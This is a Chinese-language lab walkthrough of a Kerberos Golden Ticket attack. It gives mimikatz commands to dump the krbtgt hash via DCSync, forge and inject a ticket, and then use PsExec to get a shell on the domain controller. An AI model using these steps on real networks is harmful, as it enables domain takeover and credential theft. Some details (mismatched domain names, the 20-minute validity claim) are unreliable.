0x01 实验准备
实验工具:
-
PsExec64工具是内网渗透中的免杀渗透利器。
-
mimikatz_trunk工具的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码,还可以提升进程权限、注入进程、读取进程内存等等。
实验环境:
- Windows server 2008 作为域控制器,域为 yuming.com
- Windows 7 作为 yuming域下的一台设备
0x02 黄金票据条件
- 域名称[AD PowerShell模块:(Get-ADDomain).DNSRoot]
- 域的SID 值[AD PowerShell模块:(Get-ADDomain).DomainSID.Value]
- 域的KRBTGT账户NTLM密码哈希
- 伪造用户名
0x03 实验步骤
1. 获取域控制器的 krbtgt 哈希值
在域控制器上操作:
通过 mimikatz 输入命令获取 ktbtgt 的哈希值:lsadump::dcsync /domain:test.com /user:krbtgt
也可以通过wce、gethashes等方式获取。
2. 伪造票据(低权限域用户在客户端上伪造)
在 yuming域下的设备(Windows 7)上操作:
得到 KRBTGT HASH 之后使用 mimikatz 中的 kerberos::golden 功能生成金票 golden.kiribi,即为伪造成功的TGT。
参数说明:
/admin:伪造的用户名
/domain:域名称
/sid:SID 值,域的SID
/krbtgt:krbtgt 的 NTLM-HASH 值
/ticket:生成的票据名称
生成金票命令:kerberos::golden /admin:administrator /domain:test.com /sid:S-1-5-21-593020204-2933201490-533286667 /krbtgt:8894a0f0182bff68e84bd7ba767ac8ed /ticket:golden.kiribi
3. 获取权限
在 yuming域下的设备(Windows 7)上操作:
清空本地票据缓存,导入伪造的票据
查看本地保存的票据,观察Client name:kerberos::list
清理本地票据缓存:kerberos::purge
导入伪造的黄金票据:kerberos::ptt golden.kiribi
查看本地保存的票据,观察Client name:kerberos::list
票据20分钟内有效,过期之后可以再次导入
4. 利用伪造的黄金票据
在 yuming域下的设备(Windows 7)上操作:
直接利用psexec.exe远程登录和执行命令
Whoami显示当前用户为 yuming域的administrator用户
PsExec.exe \域控计算机名 cmd.exe